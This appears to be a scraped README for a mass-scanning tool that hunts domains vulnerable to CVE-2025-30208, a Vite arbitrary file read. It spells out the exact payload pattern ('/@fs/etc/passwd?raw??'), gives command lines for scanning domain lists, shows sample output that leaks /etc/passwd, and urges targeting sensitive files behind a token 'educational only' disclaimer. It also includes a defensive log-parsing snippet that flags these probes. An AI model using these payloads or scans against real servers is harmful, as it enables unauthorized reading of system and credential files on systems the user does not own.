## https://sploitus.com/exploit?id=BD159DC1-A74E-50C7-9423-C6ADED4FC5D9
# CVE-2025-30208-ViteVulnScanner
Yo, this is a dope multi-threaded Python script by [keklick1337](https://github.com/keklick1337) to hunt down domains vulnerable to CVE-2025-30208 in Vite. Basically, it checks if you can snag random files via the `@fs` endpoint with `?raw??` or `?import&raw??` — think `/etc/passwd` leaks and other juicy shit. It’s got some smart false-positive filtering so you don’t waste time on crap, plus options to tweak how it spits out the results.
## What’s It Got?
- **Multi-threading**: Hammers through domain lists fast as fuck.
- **Protocol Flex**: Pick HTTP, HTTPS, or let it rip on both.
- **False-Positive Killer**:
  - Checks a bullshit path to see if the server’s just trolling with 200 OK and HTML.
  - Ditches responses with `<head>` and `<body>` unless it smells legit.
- **Vuln Vibes**: Spots `sourcemappingurl` or `export default` to confirm the good stuff.
- **Output Choices**:
  - Text files (`results_good.txt`, `results_maybe_good.txt`, `results_bad.txt`).
  - JSONL for the nerds who love details.
  - Toss in URLs with `-u` if you’re into that.
- **Console Spam**: Logs everything so you know what’s up.
## What You Need
- Python 3.6+ (older shit won’t cut it).
- Stuff to install:
  - `requests`
  - `urllib3`
## How to Get It Running
1. Grab it from GitHub:
   ```bash
   git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
   cd CVE-2025-30208-ViteVulnScanner
   ```
2. Install the dependencies (if you ain’t got ‘em already):
   ```bash
   pip install requests urllib3
   ```
3. Set up your files:
   - `path_list.txt`: Paths to check, one per line (e.g., `/etc/passwd`).
   - `domains.txt`: Domains to hit, one per line (e.g., `example.com`).
## How to Use It
Fire it up like this:
```bash
python3 CVE-2025-30208.py <domains_file> [options]
```
### Options, Bro
- `<domains_file>`: Your domains list (no file, no scan, duh).
- `-t, --threads`: How many threads to unleash (default: 10).
- `-p, --protocol`: Force `http` or `https`, or skip it for both.
- `-u, --urls`: Slap vulnerable URLs into the output.
- `-o, --output`: Base name for files (default: `results`).
- `-f, --format`: `txt` for split files or `jsonl` for one big-ass file (default: `txt`).
### Examples
1. Basic run, chill settings:
   ```bash
   python3 CVE-2025-30208.py domains.txt
   ```
2. Go hard with 20 threads, URLs, and JSONL:
   ```bash
   python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
   ```
3. 5 threads, HTTPS only, text vibes:
   ```bash
   python3 CVE-2025-30208.py domains.txt -t 5 -p https
   ```
## What You Get
### Text Mode (`-f txt`)
- `results_good.txt`: Shit that’s definitely fucked (has `sourcemappingurl` or `export default`).
- `results_maybe_good.txt`: Could be vuln, but no smoking gun.
- `results_bad.txt`: Clean, no worries.
- Add `-u` and URLs get tacked on with a tab (`\t`).
#### Sample `results_good.txt` with `-u`:
```
example.com https://example.com/@fs/etc/passwd?raw??
```
### JSONL Mode (`-f jsonl`)
- Files: `results_good.jsonl`, `results_maybe_good.jsonl`, `results_bad.jsonl`.
- Each line’s a JSON with:
  - `domain`: What you scanned.
  - `status`: `VULNERABLE`, `MAYBE VULNERABLE`, or `BAD`.
  - `url` (if `-u`): Where it’s fucked.
  - `response`: What the server coughed up.
#### Sample `results_good.jsonl`:
```json
{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
```
## How It Rolls
1. **False-Positive Check**:
   - Hits a fake path (`/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake`).
   - If it’s 200 OK with `<head>` and `<body>`, it’s a nope — server’s just being a dick.
2. **Vuln Hunt**:
   - Tries every path in `path_list.txt` with `@fs/<path>?raw??` and `?import&raw??`.
   - 200 OK?
     - HTML with `<head>` and `<body>`? Skip that shit.
     - `sourcemappingurl` or `export default`? Boom, `GOOD`.
     - Just 200? `MAYBE_GOOD`.
   - No 200? `BAD`.
3. **Output**: Dumps it all where you told it to.
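
The request pattern above is easy to spot from the server side. The block below is an added example, not part of this repo's code: it flags the fake-path check and the `@fs` probes in an access log and groups them by client IP. The log layout (common/combined format from a proxy in front of the dev server), the function names and the sample lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Fake path the scanner requests first for its false-positive check (from the README).
CANARY_PATH = "/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake"
# Query strings the scanner appends to /@fs/<path> (from the README).
PROBE_QUERIES = ("raw??", "import&raw??")
# Assumed log layout: ip - - [time] "METHOD target HTTP/x" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*" (\d{3}) ')

def classify(target):
    """Return 'canary', 'fs_probe' or None for one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if path == CANARY_PATH:
        return "canary"
    # "in" rather than startswith: the dev server may sit under a base path.
    if "/@fs/" in path and unquote(parts.query) in PROBE_QUERIES:
        return "fs_probe"
    return None

def scan(lines):
    """Group flagged requests by client IP; 200 answers to probes need review."""
    report = defaultdict(lambda: {"canary": 0, "fs_probe": 0, "answered_200": []})
    for line in lines:
        m = LINE_RE.match(line)
        kind = classify(m.group(2)) if m else None
        if kind is None:
            continue
        ip, target, status = m.groups()
        report[ip][kind] += 1
        if kind == "fs_probe" and status == "200":
            report[ip]["answered_200"].append(target)
    return dict(report)

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Apr/2025:10:00:00 +0000] "GET {CANARY_PATH} HTTP/1.1" 404 153',
    '203.0.113.7 - - [01/Apr/2025:10:00:01 +0000] "GET /@fs/etc/passwd?raw?? HTTP/1.1" 200 1290',
    '203.0.113.7 - - [01/Apr/2025:10:00:01 +0000] "GET /@fs/etc/passwd?import&raw?? HTTP/1.1" 403 98',
    '198.51.100.4 - - [01/Apr/2025:10:02:11 +0000] "GET /@fs/app/src/main.js?import HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Apr/2025:10:02:12 +0000] "GET /index.html HTTP/1.1" 200 612',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, hits)
```

Normal dev traffic such as `/@fs/...?import` is not flagged; only the two query strings listed above are. Any entry under `answered_200` still needs a look at the response body, for the same HTML false-positive reason the scanner filters on.
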
## Heads-Up
- SSL warnings are off (`urllib3.disable_warnings()`), so it doesn’t bitch about certs. Careful out there.
- Tweak `path_list.txt` for your targets — sensitive files are the real deal.
- False-positive filter assumes HTML means safe. If that’s bullshit for your setup, change it.
## Disclaimer
Listen up: this shit’s for educational purposes only, fam. I ain’t responsible if you fuck something up, get caught, or piss someone off with this. Use it to learn, not to be a dickhead. All risks are on you, nahuy — I’m just here dropping code.
## Who’s Behind It
- GitHub: [keklick1337](https://github.com/keklick1337) — that’s me, yo.
## Wanna Help?
Got ideas? Found a bug? Hit me up with issues or pull requests. More ways to kill false positives or dope features? Let’s make this beast even sicker.